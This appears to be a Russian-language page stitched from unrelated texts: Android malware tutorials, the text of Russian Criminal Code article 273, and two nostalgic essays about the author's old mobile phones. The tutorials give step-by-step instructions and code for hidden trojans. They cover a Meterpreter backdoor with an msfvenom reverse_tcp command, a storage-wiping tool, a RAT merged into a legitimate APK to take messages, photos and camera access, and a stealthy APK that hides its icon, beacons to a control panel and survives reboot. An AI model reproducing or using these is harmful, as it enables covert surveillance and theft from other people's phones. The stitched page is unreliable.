Статья Собираем скрытый троян на Android(persistence) Часть I
Привет с вами DarkNode
Вся инфа в ознокомительных целях,автор не несет ответственности за область ее применения!
Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.
Что нам понадобится:
Android Studio и Android SDK офф_сайт(
)
Android Meterpreter Payload source code (https://github.com/giovannicolonna/msfvenom-backdoor-android)
Ссылки так же будут в описании видео
Первый этап (Подготовительный):
Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (Этот момент я расписывать не буду
если у кого то возникнут трудности — стучитесь в личку)
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.
Ну я уже все скачал.Показывать процесс установки не буду.Опять же таки если трудности возникнут с установкой( но не должны))) ) -стучите личку.
Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как
Второй этап (Базовые настройки пейлоада)
Открываем наш проект в студии.
Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.
( long half_an_hour = (3600)/(2) ; //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )
Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>
После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)
Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).
Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")
Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк .После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.
Для этого возьмем и реверснем апк созданный с помощью msfvenon:
msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk (хотя айпи и порт можно рандомный,нам нужен только манифест от туда)
Скопируем разрешение с манифеста в наш проект
Далее осталось подписать наше приложения.
Подписали) Ну что ж давайте протестим.))
На этом наш этап пока закончим.Продолжения следует в следующей статье(видео)
Всем спасибо.
Создаем вирус на андроид
В современном цифровом мире, где информационная безопасность играет все более важную роль, понимание, как работают вирусы и как защититься от них, становится неотъемлемой частью нашей компьютерной грамотности.
Познание темы вирусов может помочь нам лучше понять, как защититься от подобных угроз. Termux, одно из самых популярных приложений для эмуляции командной строки на мобильных устройствах, предоставляет возможность практического изучения и тестирования различных аспектов информационной безопасности, включая создание вирусов.
В данной статье мы рассмотрим вирус, который удаляет внутреннюю память. Убедительно рекомендуется использовать эти знания только в легальных целях и с согласия всех заинтересованных сторон.
Внимание:
Вирус полностью форматирует (удаляет) внутреннюю память устройства! Будьте осторожны!
Утилита, которую мы будем использовать называется INFECT
"Infect" в Termux является утилитой, разработанной для демонстрации методов заражения компьютерных систем и обучения студентов аспектам кибербезопасности. Она позволяет изучать различные техники и уязвимости, связанные с вирусами, троянскими программами и другими вредоносными программами.
Создаем вирус удаленного доступа для Android. Маскируем под обычное приложение
Устанавливая очередное приложение, многие часто не обращают внимание на тот пункт, где описываются разрешения, предоставляемые приложению. Это большая ошибка, особенно, если вы скачиваете их не только с Play Market.
Вместе с, казалось бы, хорошей программой, на Ваше устройство может попасть вирус удаленного доступа (RAT). Когда-то, я уже поднимал тему RAT на Android. Мы связывали нашу "крысу" с абсолютно нормальным приложением, при запуске которого запускался и наш вирус.
Сегодня мы рассмотрим еще одну подобную программу, которая предоставляет злоумышленнику полный контроль над чужим смартфоном.
Он сможет получить доступ к любым данным на устройстве:
- личным перепискам,
- данным аккаунтов,
- фотографиям,
- документам и видео.
Также он будет иметь доступ к камере и микрофону устройства.
Создание
Перед тем, как начать работу, настоятельно советую ознакомиться с данным материалом, это убережет Вас от ошибок, а ваш ПК от нежелательных изменений.
Для работы нам понадобится Java, скачайте и установите её если не делали это ранее.
Программу для создания RAT, можете скачать здесь. Она лежит в моем втором канале
После её запуска появится такое окно.
Переходим в Tools > Payload. Указываем путь к java.exe. По умолчанию он выглядит так:
После этого появится окно создания вредоносного apk
Даем имя, пишем версию и добавляем иконку нашему приложению. Тут уж под что хотите замаскировать.
Переходим в следующую вкладку DNS Info. Там нас просят указать наш IP и порт. Я люблю работать с RAT через VPN и через него же открывать порты. Как всё это быстро и правильно сделать можете прочитать тут
Вводим IP и порт, пароль можете не изменять
Следом переходим к Properties. Тут можете выбрать свойства будущего RAT. Объяснять каждый пункт, думаю, не надо. Скажу лишь, что последний пункт с Root лучше не активировать.
В Merging app указываем apk файл, с которым мы склеим наш RAT. Когда пользователь откроет якобы нормальное приложение, вместе с ним запустится и наша "крыска".
Вирусы под андроид. Урок №1 (Начало начал)
тут особо ничего мудрить не надо. Просто идем по шагам.
1. Устанавливаем java для разработчиков с офф сайта.
2. Скачиваем android studio Качаем полную рекомендованую. Сейчас мы не будем вдаваться в эти все подробности. Оно нам надо?
3. Запасаемся бубликами и пивом. Ведь сейчас придется все это поставить и настроить.
4. Тыкаем в основном далее, не вдумываясь что там написано. Незачем забивать голову
5. После чего как мы установили все это. Запускаем студию. Ищем сверху значек SDK Manager. Он где-то справа. Нажимаем, ставим везде галки, соглашаемся с условиями и нажимаем инсталл.
6. Опять грызем бублики и пьем великолепное пиво. Тут процесс по дольше, так как будут выкачиваться виртуалки и всяческие тулзы.
7. Ну вот собственно и все.
Как все начиналось?
Мы все поставили, теперь стоит и подумать, а как тут теперь вирус написать.А для этого мы идем в File -> New -> New project. И тут нам предлогают придумать название проекта и домен сайта компании. Вводим что взбредится в голову. На основе этих данных генерируется package имя. Которое использоется как уникальный идентефикатор нашего APK. Жмем далее. Тут нам предлогают выбрать платфурму под наш проект. Ну тут мы выбираем только Phone. Остальное рассмотрим позже.
Далее. И теперь нам предлогают выбрать как будет выглядеть наше окошечко (Activity) стартовое, главное. Тут есть важная особенность. Чтобы запустить какой либо код сразу после установки, нужно чтобы было какой либо из окошек при старте. Поэтому выбираем любое кроме No Activity. Лучше всего выбрать Empty. Будет легче его вычищать, от ненужного мусора. Далее. Пишем название окошку и нажимаем Finish.
Пока файлы нового проекта индексируются и настраивается сборщик проекта.
Эй, ты слишком жырный!
Пробуем собрать проект наш. Build -> Generate signed apk.. И что мы видим? APK с 1 окошком и приложением которое ни чего не делает. Занимает 1 мегабайт. Надо с этим что-то делать, а именно отказывать от библиотек (AppCompat). Это красивая графика, которая нам не нужна. Переходи в файл MainActivity.java
Заменяем
public class MainActivity extends AppCompatActivity
public class MainActivity extends Activity
Заходим в настройки проекта и во вкладке Dependes удаляем строку с AppCompat. Далее переходим к файлу values.xml и styles.xml. Удаляем их.
Заходим в androidManifest.xml и
меняем
Собираем наше приложение, ура! размер меньше 40 кб. Уже есть с чем работать.
Почему ты не прячешься?
Далее, нам нужно спрятать нашего зверька. Чтобы иконка не была видна в списке менеджера приложений. А так же надо закрыть наше приложение.
Вставляем после setContentView(R.layout.activity_main)Следующий код:
String pgkname = getApplicationContext().getPackageName();
ComponentName componentToDisable = new ComponentName(pgkname,pgkname+".MainActivity");
Этот код скроет нашу иконку с глаз И после всего этого пишем:
Теперь наше приложение после установки. Запускается и сразу же скрывается с глаз долой. Ух, проделали мы работу. Но надо идти дальше, а то бот не появиться в админке.
Тук, тук, открывайте, полиция!
Теперь мы должны сделать так, чтобы наш чудесный APK начал стучать в админку. Тут я уже полагаю, что админка где-то написана. И от нас требуется только стучать. Возьмем самый простой метод, он не будет работать корректно на андроидах выше 4.х. Но с чего-то надо же учиться. Я же не за вас работу делаю. Нам нужно создать сервис. Для этого мы создаем файл с новым class. (Правой тыкаем в проекте, на папку Java). Название класса пишем к примеру Network. Нажимаем окей. Удаляем все содержимое файла кроме первой строки где прописан package и заменяем на
public class Network extends Service<
public int onStartCommand(Intent intent, int flags, int startId) <
public IBinder onBind(Intent intent) <
throw new UnsupportedOperationException("");
public void onCreate()
MyTimerTask myTask = new MyTimerTask();
Timer myTimer = new Timer();
myTimer.schedule(myTask, 10000, 10000);
class MyTimerTask extends TimerTask <
public void run() <
public String GET(String url)<
InputStream inputStream = null;
HttpClient httpclient = new DefaultHttpClient();
HttpResponse httpResponse = httpclient.execute(new HttpGet(url));
> catch (Exception e) <
Это код описывает класс сервиса, в котором при запуске, запускает таймер и каждые 10 секунд отправляет GET запрос на URL и запрашивает ответ. Но это не все. Этот код не будет работать если мы объявим наш сервис в манифесте и не дадим права выходить в интернет нашему приложению. Идем в манифест.
и в описание application
Осталось запустить наш сервис. Идем в MainActivity и перед finish() вставляем запуск сервиса
getApplicationContext().startService(new Intent(getApplicationContext(), Network.class));
Теперь у нас есть апк, который сам себя скрывает после запуска и запускает процес отстука в админ панель. Где написано // Обработка result : там происходит обработка ответа и команд админки. Не сложно, правда? Но пока мы пили пиво. Мы совсем забыли, что если телефон перезагрузят. То наше приложение уже ни когда не запустится. Для этого мы идем опять в манифест.
Добавляем права на запуск после ребута:
Добавляем обязательно обработчик в описание application
Теперь после перезапуска у нас вызовется класс Boot. И сейчас мы его создаим. Все делаем как я писал выше. Создали и удалили все кроме package.
public class Boot extends BroadcastReceiver <
public void onReceive(Context context, Intent arg1) <
context.startService(new Intent(context, Network.class));
Конец, и пару слов.
Если есть вопросы, задавайте. В окончании у нас появился прям такой игрушечный бот (APK). Что послужит вам хорошей базой и внесет немного понимания, как это все работает. Спасибо за внимание. Сильно не пинайте, опыт первый. А вот критику хотелось бы услышать, чтобы след урок получился лучше.
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
(в ред. Федерального закона от 07.12.2011 N 420-ФЗ)
(см. текст в предыдущей "редакции")
""1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, —
наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
Хотели критику? Такое есть у меня: орфографические ошибки исправить и лишние пустые строки.
Обо всех моих мобильных телефонах, начиная с 2003-го
В это трудно поверить, но более 20 лет назад мобильные телефоны считались показателем богатства. Огромный вес, нулевой функционал и при этом запредельная цена. Неудивительно, что в 90-е годы ими пользовались лишь единицы. А сейчас у людей очень большие лопаты с дисплеем 6-7 дюймов, мощной начинкой и обширенным функционалом. К нынешним дням, смартфоны стали неотъемлемой составляющей нашей жизни, ведь современный среднестатистический человек просто не способен представить себе жизнь без Ютуба, без социальных сетей как ВК, Инстаграма, Тик-Тока, мессенджеров и тому подобное. Но с другой стороны, телефоны лишились большей части своего бывалого феномена, когда они были разными и по-своему уникальными. Сейчас какие-то там Xiaomi и iPhone внешне отличить просто-напросто невозможно. Они стали похожими друг на друга как близнецы. Поэтому, мне хотелось бы вспомнить былые времена, написав пост о своих телефонах, которыми мне доводилось владеть за последние два десятка лет (почти).
Момент моего знакомство с мобильными телефонами выпал примерно на начало двухтысячных годов. Мы играли во дворе и между нами было намного больше живого общения. Как правило, телефоны были только у взрослых, а детям такую технику особо не доверяли. Смотря на то, как мои родители пользуются мобилками, я очень хотел иметь такой же. И глядя на мою заинтересованность, родители решили мне приобрести его. Итак, это был 2003 год. Был летний денёк, также был мой день рождения. И буквально на следующий день, я получаю свой первый мобильник.
Я был так рад — Siemens ME45, aka Мессер. Для тех лет он смотрелся стильно. Сменный и крепкий корпус, за счёт чего аппарат не боялся ни ударов, ни падений, ни погружений в воду. Сейчас смартфоны в дребезги разбиваются даже при падении с полуметровой тумбочки. Ни о каком погружении в воду — речь даже не идет. Вдобавок, они очень быстро разряжаются. В Siemens ME45 аккумулятор умудрялся держать заряд чуть ли не всю неделю. А оранжевая подсветка дисплея и клавиатуры — словно светящаяся звезда на небе. Из игрулек тут мало, чего мне вспомнить. Разве что, Stack Attack.
Игра про человечка, которому ты помогаешь правильно в ряд разложить ящики. И это при том, что этого человечка не должно раздавить упавшим ящиком, а не то игра закончится. Игра стала классикой. Ведь в то время сыграть в игру на настоящем телефоне, лежа на кровати — это было ни с чем не сравнимо чувство!
Помимо этого, на этом аппарате был некий создатель мелодий, в котором была возможность делать собственные мелодии и ставить их на рингтон. От чего нередко можно было услышать, как пищат мелодии из Бригады или Бумера. Также, я получал мелодии на телефон, записывая отрывок песни на диктофон. Да, здесь был диктофон, пускай на три минуты, которых на короткие мелодии — было в избытке.
Ну и как ни странно, но на моей трубе присутствовал мобильный интернет. Да — интернет на маленьком монохромном экране и с очень низкой скоростью. В общем, бывало и такое. Сами сайты открывались только в текстовом виде, и то далеко не все. Но в то время залезать в интернет на телефоне — было себе дороже. Ибо за минуту тратилось столько денег со счета, сколько бы ты не заработал за всю свою жизнь.
В общем, проходил я со своим Siemens ME45 где-то до весны 2005 года. К тому времени, на рынок успели появиться новые мобилы, разнообразие которых просто поражало!
От слайдеров и раскладушек до необычных по форме смартфонов на Symbian, которые, в частности, делали Nokia, ну и что-то странное делали и Siemens (особенно выделилась модель N-Gage от Нокии и линейка Xelibri от Siemens). Но как ни крути, мой Siemens начал смотреться очень дико и банально устарел. Решение было одно — просить деньги у родителей. Просил около двух месяцев. В конце концов, они мне дали, хоть немного. И в этот же день я отправился в Евросеть, заранее изучив каталог мобилок.
Мои требования были такими: цветной экран, инфракрасный порт, камера, поддержка Java-игр — и все это за небольшую стоимость. Таким требованиям соответствовал один из телефонов — а именно Sony Ericsson K500i.
После его покупки моя жизнь уже не была прежней. Сказать, что я был в восторге — это ничего не сказать! Когда я с ним пошел в школу — то уже начал во все вникать. В школе по инфракрасному порту все перекидывались играми, в которые мы рубились, а также музякой, картинками, приколами и прочим. Кстати про игры, то королями в этом плане были те, у кого были телефоны Siemens, ведь именно они умели перекидывать игрули. Все им завидовали. Контент на свой телефон я тоже получал, и довольно много, ибо памяти в 12 мегабайт было с головой!
Со временем я научился скидывать музыку с компа на телефон, которую мы слушали по дороге в школу, а также научился скачивать установочные файлы игр, благодаря чему, я скидывал игрули своим одноклассникам. Да, было время. Пришло время немного упомянуть некоторые игры. Среди них были:
Попсовый на то время Gravity Defied. Игра была не в меру хардкорной, ведь нужно было ехать по кривым дорогам, при этом не разбившись на мотоцикле. Мучительно сложная игра, благо хоть не заскучаешь. К тому, на нее выходили сотни разных уровней.
Prince of Persia Warrior Within. В детстве я проходил первую игру о Принце еще на Денди. Мобильная Prince of Persia оказалась ничем не хуже. Герой бежит по уровням и круто своими клинками раскидывает врагов налево и направо! Как же круто он дрался!
Кто хочет стать миллионером. Я любил эту передачу. А тут уже тебе дают возможность сразиться за миллион, хоть ненастоящий.
Бессмертная классика жанра — Worms. До этого мы играли в безумных червячков в друга, у которого был очень старый компьютер, на втором Пентиуме. А тут, на одном телефоне можно было сражаться хоть по несколько человек! Бей, круши, ломай карту любым оружием! Сложно представить, как это было круто!
Игр было очень много, и делались они с душой (нынешние мобильные донатные помойки, наспех сделаные четвероклашкой Васей Залупкиным — ни в какое сравнение не идут). Музыка тоже была разной. А рингтон, который стоял у тебя на звонке — отображал твою индивидуальность. У кого-то стояла фирменная мелодия, у кого-то популярная на тот момент песня, а у кого-то — вообще какая-то приколюха.
Но как бы круто ни было, сейчас речь пойдет о джойстике телефона. И это была беда, ибо спустя несколько месяцев, на моем Сони Эриксоне начал глючить джойстик. Он работал, но очень неадекватно. По гарантии, я отнес телефон в Евросеть, дабы починили джойстик. И починили? Нет! Они просто перепрошили телефон, добавив в меню иконку сайта Евросети. После этого, кстати, я больше не покупал у них вообще ничего. К сожалению, джойстик так и не починили, и он не работал как надо. В один момент, он меня разозлил настолько, что телефон полетел об стену. От испуга я быстро его собрал. Внешне он был почти цел, а дисплей — был разбит. Я был удивлен. Благо после того, как я отнес разбитый телефон и мне его починили — всё было супер! Дисплей отображался, с джойстиком не было проблем. Впрочем, телефон работал почти как швейцарские часы. В то же время я его каким-то образом перепрошил, убрав из меню значок сайта Евросети. А на то, что на моем Сони Эриксоне не работал джойстик — мне было как-то пофиг, ибо я передвигался по меню цифровыми кнопками. Костыли, но деваться от этого было некуда.
Время шло, свой Сони Эриксон я потерял. А точнее — его стырили в Макдаке (было это в начале сентября 2006 г). Мда уж. Спустя пару недель, когда моя обида прошла, я начал выбирать новый сотовый. Как и в прошлый раз, я выбирал его самостоятельно. Мой выбор пал не на SE, а пал уже на Nokia. Неожиданно, да. И им оказалась Nokia 6233, которая стоила недешево — уже в два раза дороже моего прошлого Сони Эриксона. Подойдя к родителям, я аккуратно сказал, что хочу новый телефон уже за 200 латов. К моему счастью, они дали мне добро — и позволили его взять!
После приобретения Нокии, мой вау-эффект оказался силен, да и я по максимуму погрузился в ее возможности!
По габаритам она была компактной, списывать на контрольных работах можно было почти без палева. Камера была уже получше — 2 мегапикселя. Пускай без вспышки, без автофокуса, но для меня это был совершенно новый уровень. Да и записанные видео смотреть было намного приятнее, ведь их разрешение было уже 640х480, что для того времени в телефонах было круто, особенно в сравнении с 176х144. Кстати про видео, то именно на Нокии я впервые начал их монитровать в одном из видеоредакторов.
Встроенной памяти было крайне мало — всего лишь 6 мегабайт, но никто не запрещал покупать карты памяти. В комплекте с моей Нокией шла карточка на 64 мегабайта, но потом — я перешел на карту памяти объемом на 2 Гб формата microSD, который, кстати, распространяется до сих пор. Также, я облегченно вздохнул от того, что вместо джойстика были нормальные кнопки. И в отличие от Сони Эриксона с джойстиком, мне не приходилось носить Нокию в сервисный центр. Кнопки работали нормально, а набирать сообщения было одно удовольствие. Ну и играл в Java-игры тоже с комфортом. Кое-что из них, для меня были новыми, а именно:
Властелин Колец: Битва за средиземье. Мне всегда нравились фильмы о Властелине, да и не против посмотреть их даже сейчас. Сюжет этой игрушки меня сильно вцепил. Получил я эту игру примерно осенью 2010 года. Помню, как много раз ради нее прогуливал скучные пары.
Gish. Очень даже прикольная игрулька. Идеальное передвижение по разнообразным локациям, простой, но увлекательный геймплей. Насколько я помню, в эту залипаловку можно было играть по Bluetooth.
Doodle Jump. Еще одна классика жанра, при чем она была не менее популярной, чем Gravity Defied. Игра, в которой ты рано или поздно проиграешь, потому что она бесконечна. Суть игры проста как две копейки — прыгаешь как можно выше, избегая препятствий и избавляясь от враждебных тварей.
Diamond Rush. Эту игруху я получил после перепрошивки телефона в 2008 году. Тоже весьма годная игруха, чтобы скоротить время. Идешь ты по уровням трех локаций: Ангкор-Ват, Бавария и Тибет, каждая из которых подкидывает новых врагов. Цель игры тоже проста — проходишь уровни, собираешь алмазы и убиваешь врагов, используя молоток.
Gangstar: Crime City. Пожалуй — лучше Java-игры уже не выходило! Ничто иное, как настоящий аналог GTA в твоем кармане! Иди куда душа пожелает, убивай кого хочешь из любого оружия!
Были другие игрульки, но сейчас о них особо не вспомнишь. А жаль.
Вот за что я больше всего гордился своей Нокией — так это за стереодинамики, о которых будет грехом не вспомнить. Когда мы в компании хотели врубить музон — то всегда сделать это просили именно меня, потому что моя Nokia звучала громче всех, от чего 2 гигабайта моей карты памяти былы почти полностью набиты различной музякой! Нокии на Xpress Music и Сони Эриксоны с Walkman — просто отдыхали. А всякие Моторолы — ни в какое сравнение не шли даже!
Так, о чем я забыл? Ах да — про интернет. С поддержкой 3G интернет стал грузиться значительно быстрее, да и трафик стоил значительно дешевле, благодаря чему в 2008-2009 гг. началась та эпоха, когда люди начали зависать у ВК, параллельно переписываясь в ICQ. Чем, в принципе, занимался и я. Были различные клиенты Аськи — Jimm, Qip, Bombus и прочие. Немного вспомню о мобильном браузере. Фирменный браузер Нокии был сырой и работал некорректно, поэтому, вместо него выбирали Opera Mini, с которой почти не было висяков и прочих костылей. Оттуда я начал качать Java-игры, темы, обои и прочее. Да уж, прошло почти 15 лет, а всю эту ламповость помнишь и по сей день.
Вот таким образом, Nokia 6233 служила мне верой и правдой более пяти лет — до декабря 2011 года. Примерно начиная с 2011-2012 гг. постепенно наступали те времена, с которыми мы знакомы сейчас. Телефоны с кнопками начали постепенно уходить в прошлое, а на замену им пришли разные смартфоны на разных системах. Если сейчас, кроме iOS и Андроида, не осталось больше ничего, то если посмотреть почти на 10 лет назад — помимо яблочной системы и зеленого робота были и Symbian, и Meego, и Windows Mobile (потом и Windows Phone), Blackberry OS, Palm OS. И это далеко не весь перечень мобильных ОС на тот момент. Если честно, упомянутые ОСи как-то прошли мимо меня. Все-таки хорошо, когда ты не меняешь свой телефон часто, ибо можно открыть для себя то, о чем не знал раньше. Поскольку Андроид успел стать самой популярной мобильной системой уже под конец 2011 года, мой следующий аппарат оказался именно на нем — HTC Desire S, о котором сейчас пойдет речь.
Тогда мне было 18 лет, а до этого я уже успел устроиться на работу, для которой возможностей моей Nokia 6233 было уже недостаточно. Лишь 30 декабря, когда заканчивался 2011 год, я взял немного из той суммы, которую до этого заработал — 260 латов (примерно 15000 руб).
За эту цену я рассматривал три смартфона: Samsung Galaxy Nexus S, iPhone 3GS и HTC Desire S. Начну с Самсунга. Он мне не подходил по некоторым критериям: в нем была посредственная камера и максимальное количество памяти в 16 гигабайт без возможности расширения. HTC имела меньше памяти, но хотя бы можно было ее расширить. Да и камера была получше. Кто же выиграл — естественно HTC. Ни о каком iPhone 3GS с его кастрированной iOS — даже речи не шло.
HTC Desire S. Весьма прикольный аппарат, так как это был мой первый телефон с сенсорным экраном. До этого я щупал другие тачфоны у друзей и одногруппников. Что касается системы, то из коробки на нем был Android 2.3 с оболочкой HTC Sense, которая красиво выглядела.
Вот та оболочка, от которой меня тошнило, это была TouchWiz от Samsung — просто фу! Через некоторое время прилетело обновление на Android 4.0.3, после чего смартфон начал больше тупить, тормозить и быстрее разряжаться. Именно тормоза смотивировали меня прошить свой HTC. В это же время, я познакомился с сайтом 4PDA, и там я нашел одну прошивку. Как сейчас помню, после этой прошивки — я получил кирпич! То есть, смартфон был на вечной заставке. Это было вечером одного дня. Безысходность и стресс — сразу же подъехали! Благо спустя 3-4 часа — я «воскресил» HTC. И именно с этого момента, смартфоны начали притягивать меня все сильнее и сильнее. Кастомные прошивки, Root права, различные лаунчеры и многое другое.
Помимо всего, я нередко рубал в разные игрушки, как Angry Birds, Fruit Ninja, Subway Surfers, адски хардкорный Shadow Fight 2 и Hungry Shark. Но и памяти на это нужно было немало. Для Андроида одного гигабайта памяти было очень мало, поэтому все было решено покупкой карты памяти на 32 Гб, и уже в 2014-15 годах, память моего HTC была забита почти на 90%. Чем же было столько занято? Да музыкой, видосами, картинками, играми, приложениями и т.д. А за несколько месяцев до этого, мой HTC был прошит до неофициального Android 4.4 — через Cyanogenmod 11. На этой прошивке он был не менее шустрым, чем ранее.
Ну и вот так, проходил с HTC Desire S примерно до апреля 2015 года. В то время у меня появилось первое устройство флагманского уровня — им же оказался Sony Xperia Z2.
Почему я выбрал именно его? А потому что размеры смартфона играли для меня ключевую роль, чтобы смарт был компактным и не казался слишком большим. Напомню, это был 2015 год. Стандартом тогда считались две диагонали смартфонов: 5 и 5.5 дюймов. В одного моего кореша был Samsung Galaxy Note 3, который для меня казался просто здоровенным.
На удивление, Иксперия в моей руке лежала довольно хорошо. Чем же еще Sony Xperia Z2 была топом? Да практически всем. Snapdragon 801, 3 Гб оперативки, 16 Гб встройки с возможностью расширения до 128 Гб.
Изначально у меня стояла карта памяти из прошлого смартфона, но я довольно быстро сменил на карточку в 128 гигабайт. Это было не роскошью, а необходимостью, ибо приложения начали весить больше. Да что там приложения, камера снимала лучше и записывала видео в 4К. Соответственно, и памяти на это нужно было намного больше.
Хоть этот смартфон изначально выходил на Android 4.4, но мне он достался уже с Android 5.0. По факту, это было переломное время, когда Андроид начал работать шустрее и стабильнее, чем на предыдущих версиях. Касательно моей прошивки — то первые два месяца я сидел на родной, познавая ее фишки и возможности. А поскольку я любил, крхм, «эксперименты» — то естественно, я начал прокачивать смарт. И сколько же было поставлено прошивок за эти 6 лет, на протяжении которых я пользовался Сонькой — говорить не придется. Одним словом — я добивался того, чтобы смартфон был максимально шустрым, функциональным, удобным для меня, да и хорошей автономностью. Пытался выжать из смартфона все соки, ибо когда свободных денег нет, а есть желание во всем этом разбираться — почему бы и нет.
Но как сами знаете, ничто не вечно. Ведь не так давно, а именно в июле 2021 года, моей Sony Xperia Z2 потребовалась замена. И так мною был куплен OnePlus 9, но про него писать будет бессмысленно, ибо какой смысл отдельно писать о том смарте, которым сейчас пользуешься? Так что, это уже совсем другая история.
Такой у меня получилась эта долгая история. Это был крайне долгий, но интересный путь. Спасибо всем, кто дочитал и получил чувство ностальгии. Не забудь ниже написать, какими мобильными телефонами были в использовании лично у тебя!
Старые мобильные телефоны — ностальгия
Физкульт-привет, дамы и господа. В наше время почти каждый в мире человек имеет 6- или 7-дюймовый смартфон с неограниченным функционалом. Мы живем в эпоху ВК, Инстаграма, без которых не представит себе свою жизнь среднестатистический человек. Также человек, которому сейчас меньше 20 лет, не представит, как пользовались телефонами много лет назад. Как раз мне и хотелось вспомнить те далекие времена, когда деревья были выше, трава была зеленее. А телефоны не были друг на друга похожи как близнецы. Уже лет 15 прошло, даже больше!
Итак, начнем все по порядку. Самые первые мобильные телефоны пришли на рынки стран СНГ в конце прошлого века. Примерно тогда, на рынок появился легендарный Ericsson A1018s.
Какой в нем был функционал? Нулевой. Это был не более, чем типичный мобильник по тем годам, ведь все, на что он был способен — так это звонить и отправлять сообщения. А также были такие мелочи, как часы и будильник. О всяких играх и других развлечениях — речи даже не шло. Сама труба стоила дорого настолько, что буквально никто не мог ее себе позволить, тем более с учетом кризиса 1998 года. Поэтому неудивительно, что в 90е годы люди с телефонами считались элитой, опять-таки из-за высокой цены мобил.
Проходит некоторое время, и телефоны впервые стали по-настоящему массовыми (примерно 2000-2001 гг). Сотовые связи только начали покорять уголки нашей величайшей страны. Звонки стоили дорого, а всякая тарификация — еще дороже. Счет пополнялся вовсе не через интернет, а с помощью специальных карточек для различных операторов. Но вернусь к самим мобилам. Это было время, когда для счастья нам хватало всего двух цветов. Самым известным представителем той эпохи является легенда легендных легенд — Nokia 3310.
Телефон, о котором слышала даже твоя собака. Что с ним только не делали: бросали об стену, уроняли в воду, открывали им разные напитки, обливали бензином, обжигали, кидали с окна 9 этажа, и еще тысяча и один эксперимент был проведен во время краш-теста этой легенды. Честно говоря, мне не доводилось им владеть. Но такой был у моего друга, который владел им аж до 2013 года! Дело было не в том, что он не мог себе позволить телефон лучше, а в том, что ему, кроме звонков и СМС, ничего не было нужно.
А лично мой первый телефон был совсем другим, но был на то время также известен. Это был Ericsson A2628s, купленный весной 2001 года.
По соотношению качества и стоимости это был один из самых лучших! Стильный на тот момент дизайн, а также хорошее качество сборки, что хрен его убъешь. Он не скрипел и не болтался. Ну и долгий заряд никелевой батареи, что еще раз говорит, что у современных смартфонов батарея просто ниже плинтуса (они дьявольски нагреваются и очень быстро разряжаются — даже двух часов не способны прожить без подзарядки). Ну и куда же без возможности системы ввода Т9, автоматически исправляющая ошибки. Касательно игр — тут довольно скромно — их было три, одной из которых был знаменитый тетрис. Самое крутое было то, что имея подобную мобилу — ты не принуждался ограничиваться только встроенными мелодиями, ведь было аж несколько способов получить их. Первый из них — платный и геморройный. Существовали специальные журналы, в которых были мелодии и картинки. Также в них был номер, на который ты был обязан отправить платное СМС. Касательно самих журналов, они обновлялись довольно часто, и соответственно, были новые мелодии — монофонические, которые пищали громко до боли в ушах! Второй способ, как по мне, был более предпочтительный. Бесплатный и легкий. Собственно — это встроенный редактор мелодий, в которым была возможность создать свою мелодию. Плюс в том, что не было никакой нужды платить деньги и идти на всякие танцы с бубном, а минус — пришлось делать песенку самостоятельно.
Олды, кто помнит монофоническую мелодию из Бумера или Бригады? Отзовитесь! Вот поэтому и были эти телефоны такими королями, потому что умели многое. И насколько бы смешно это не звучало, но на моем Эриксоне была возможность выхода в интернет. Да-да, интернет на маленьком черно-белом экранчике, да и с очень низкой скоростью. Более того, доступ к WAP стоил настолько дорого, что когда ты случайно нажал на кнопку выхода в WAP, ты хотел как можно быстрее выйти с него, дабы ты не потерял кучу денег со счета. Как раз из-за того, что мобильный интернет стоил сумасшедших денег, люди попросту не могли им пользоваться. Старницы были исключительно текстовыми, да и то открывались неадекватно. Да и зачем это нужно было в 2001-м? Я не знаю. Но это были неимоверно древние времена.
Потом, как не трудно догадаться — пошла вода горячая! Начиная примерно с 2002-2003 гг. началась эра телефонов уже с цветными экранами. Первыми представителями телефонов с ПОЛНОЦЕННЫМИ цветными дисплеями стали:
Sony Ericsson T68
Motorola T720
Поначалу они умели тоже самое, что и черно-белые. Только экран стал цветным и мелодии полифоническими — на слух в разы приятнее пищалок. Также было не без болячек: у них памяти было максимум 4 мегабайта, из-за чего были мелодии, при воспроизведении которых играло либо начало, либо песня сразу стартовала с припева. Это во-первых. Во-вторых, у них была посредственная камера, разрешение снимков которой было либо CIF (352х288), либо VGA (640х480). Разнообразие телефонов настолько поражало, что словами не описать! Слайдеры, жабки, трансформеры и это далеко не всё!
Помимо всего этого, также были и телефоны, которые выглядели немного странно, а некоторые — и вовсе имели чересчур упоротый дизайн. Звучит смешно, но их в основном штамповала Nokia.
В общем, к 2005 году я сделал вывод, что мой Ericsson A2628s — устарел, по сравнению с этими мобилами. И надо бы заработать на новую трубу. Я был в то время подростком, и мне кое-как удалось найти работу и заработать неплохую сумму — целых 11к рубчинских.
